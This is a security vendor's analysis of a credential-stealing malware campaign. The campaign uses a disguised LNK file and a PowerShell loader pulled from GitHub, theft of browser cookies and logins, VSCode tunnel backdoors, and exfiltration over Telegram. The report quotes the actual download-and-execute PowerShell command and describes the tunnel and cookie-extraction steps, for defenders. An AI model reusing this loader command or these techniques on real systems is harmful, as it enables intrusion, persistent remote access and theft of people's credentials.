Phantom-Goblin_ Covert Credential Theft and VSCode Tunnel Exploitation

Summary

A newly identified malware strain is being distributed through RAR attachments, using social engineering techniques to deceive users into executing a malicious LNK file disguised as a legitimate document. Once executed, this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository, allowing the malware to perform various malicious activities while operating stealthily.

The malware primarily targets web browsers and developer tools for data theft and unauthorized system access. It forcefully terminates browser processes to extract sensitive information such as cookies, login credentials, and browsing history. Additionally, it leverages Visual Studio Code tunnels to establish unauthorized remote access, allowing TA to control compromised systems without triggering traditional security alerts. By disguising itself as legitimate applications, the malware effectively bypasses detection while exfiltrating stolen data through a Telegram bot. To evade security mechanisms, the malware exploits trusted tools like PowerShell and GitHub, blending its activities into normal system operations. The stolen data is archived into JSON and ZIP files before being transmitted to a TA-controlled Telegram account. This stealthy data exfiltration technique makes it difficult for traditional security solutions to detect and block the attack. For tracking purposes, we are naming this operation as "Phantom Goblin." The figure below shows the overall infection chain.

Technical Details

Cyble Research and Intelligence Labs (CRIL) has identified malware distribution leveraging RAR attachments. While the exact initial infection vector remains uncertain, it is suspected that these RAR attachments are being delivered via spam emails to target unsuspecting users. The TA employs social engineering techniques to trick users into executing a malicious shortcut (LNK) file disguised as a legitimate document. Specifically, the RAR archive file named "Proofs.rar" contains an LNK file named "document.lnk", which is designed to resemble a PDF document. This deceptive naming strategy is intended to lure unsuspecting users into clicking the shortcut file, believing it to be a legitimate document, as shown below.

Upon execution, the malicious LNK file initiates a PowerShell command that retrieves and executes a remote script from a GitHub repository. The command is designed to run stealthily, leveraging PowerShell to silently execute the script, potentially facilitating further malicious activities.

● C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w h -c iex(iwr 'hxxps://raw.githubusercontent[.]com/eagle-1337/x/main/x')

The PowerShell script ensures persistence by adding a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, allowing it to execute the script from the GitHub repository every time the system starts. It then defines a set of payloads with filenames resembling legitimate applications, such as updater.exe, vscode.exe, and browser.exe, and assigns a base URL from which these files will be downloaded. These files are Go-compiled binaries that have been packed using UPX.

The script checks whether each payload already exists in the system's temporary directory. If not, it fetches the corresponding file from GitHub using Invoke-WebRequest. Once downloaded, the payloads are executed discreetly in the background with no visible windows, ensuring the attack remains stealthy while maintaining control over the compromised system.

Updater.exe

The Updater.exe file attempts to steal cookies from Chrome, Brave, and Edge browsers by first checking for any running instances of these browsers. It does this by executing the tasklist command to identify active processes. If any browser processes are found, it forcefully terminates them using taskkill.exe. This termination ensures that the browser's files, including cookie storage, are not in use or locked, allowing the malware to access and extract cookie data without interference

After terminating the browsers, the malware launches a new instance of the targeted browser using the default user profile directory. It runs the browser in headless mode, meaning there is no visible user interface, and enables remote debugging on port 9222. This technique allows it to bypass App Bound Encryption (ABE) and extract cookie data without user detection.

The archived file is then transmitted to a TA-controlled Telegram account using the sendDocument method of the Telegram Bot API. This allows the TA to remotely receive the stolen cookies without direct interaction, ensuring stealthy exfiltration of sensitive browsing data.

Vscode.exe

The “vscode.exe” establishes a Visual Studio Code (VSCode) tunnel on the victim’s system and exfiltrates its connection details to a TA Telegram bot. This enables unauthorized remote access while evading traditional security detections.

Upon execution, the “vscode.exe” first checks for any running instances of VSCode by querying active processes using the tasklist command. If it detects “code.exe”, it forcefully terminates the process using taskkill /F /IM code.exe, ensuring that the legitimate VSCode application is closed. This step likely prevents interference from an existing instance and allows the malware to deploy its own version of VSCode without user detection.

Following this, the malware executes a PowerShell command that downloads a ZIP file of Visual Studio Code from its official update URL and saves it as “vscode.zip” in a temporary directory named “vscode_temp”. This approach helps maintain the appearance of legitimacy by using a genuine copy of VSCode while allowing the TA to manipulate its execution for malicious purposes.

Once the download is complete, the malware executes another PowerShell command that extracts the “vscode.zip” archive using the “Expand-Archive” command, placing its contents into the specified temporary directory. This prepares the extracted files for further execution

The malware now initiates another PowerShell script to interact with the extracted VSCode binaries. The script navigates to the extracted VSCode directory and logs out any active tunnel sessions using the command “./code.exe tunnel user logout”. This step ensures that no pre-existing VSCode tunnels remain active, likely to prevent conflicts or avoid detection by the legitimate user. Following a 10-second delay, the script launches “code.exe” with the command “tunnel --randomname --accept-server-license-terms”, redirecting its output to a file named “output.txt”. The execution is performed in a hidden window to avoid raising suspicion. The “output.txt” file captures the details of the newly created VSCode tunnel connection, which the TA then exploits. The figure below shows the content of the output.txt.

After another 10-second delay, the script reads the contents of output.txt, which contains the victim’s VSCode tunnel connection details, and exfiltrates this information to a TAs Telegram bot using an API request. The bot token and chat ID are hardcoded into the script, allowing the TA to receive the compromised tunnel credentials in real-time. By leveraging VSCode tunnels, the TA can establish remote access to the victim’s system while avoiding traditional security detection methods. The figure below shows the PowerShell code responsible for creating VSCode tunneling.

Browser.exe

“Browser.exe” collects a wide range of browser-related data, including browsing history, visited websites, login credentials, tracking data, session details, cookies, downloaded files, form inputs, personalization settings, and installed extensions. It targets multiple widely used browsers, as listed in the table below.

Before collecting browser information, it forcefully terminates processes associated with the targeted browsers using the taskkill command to prevent file access conflicts and ensure unrestricted data extraction.

The malware now extracts various types of sensitive information from targeted browsers. The extracted data comes from files such as Login Data, Cookies, History, Web Data, Preferences, IndexedDB, Session Storage, Local Storage, Brave Wallet Storage, and the Affiliation Database. Following this, the malware organizes it into .json files within the %temp%\results directory. Each file is named following the pattern __.json, as shown in the image below.

Finally, the stolen data is archived into a single ZIP file named %username%.zip and then transmitted to a Telegram channel using the sendDocument API. The exfiltration process utilizes Telegram Bot ID 8105027522 along with an authentication token. The TA also generates a logs.txt file in the %temp% directory to record all activities executed by the stealer. Each log entry is prefixed with the marker [goblin], as shown in the image below.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

Safety Measures to Prevent Ransomware Attacks

● Avoid opening unexpected RAR, ZIP, or LNK files, even if they appear to come from trusted contacts, without verifying the source.

● Enable advanced email filtering to block potentially malicious attachments and ensure all attachments are scanned with updated security solutions before execution.

● Enforce strict access controls and authentication mechanisms to disable or restrict the use of VSCode tunnels by unauthorized users.

● Deploy robust endpoint protection with real-time threat detection to identify malicious processes, such as PowerShell execution, unusual registry changes, and suspicious file downloads.

● Restrict the use of PowerShell and script execution on end-user systems unless necessary.

● Implement strict browser security policies and access controls to prevent unauthorized debugging and restrict direct access to sensitive browser data

● Monitor outbound network traffic for suspicious connections, including unusual Telegram API activity or untrusted external servers.

Conclusion

This malware attack highlights the increasing sophistication of cyber threats that leverage social engineering and trusted tools for stealthy execution. By disguising itself within a RAR attachment, it deceives users into executing a malicious LNK file that initiates PowerShell-based attacks. The malware is designed to steal browser data, establish unauthorized remote access via VSCode tunnels, and exfiltrate sensitive information while avoiding detection. It terminates active browser processes to access stored data, uses remote debugging for extraction, and archives stolen information before transmitting it through encrypted channels. Sigma rules [1],[2] to detect this campaign are available for download from the linked GitHub repository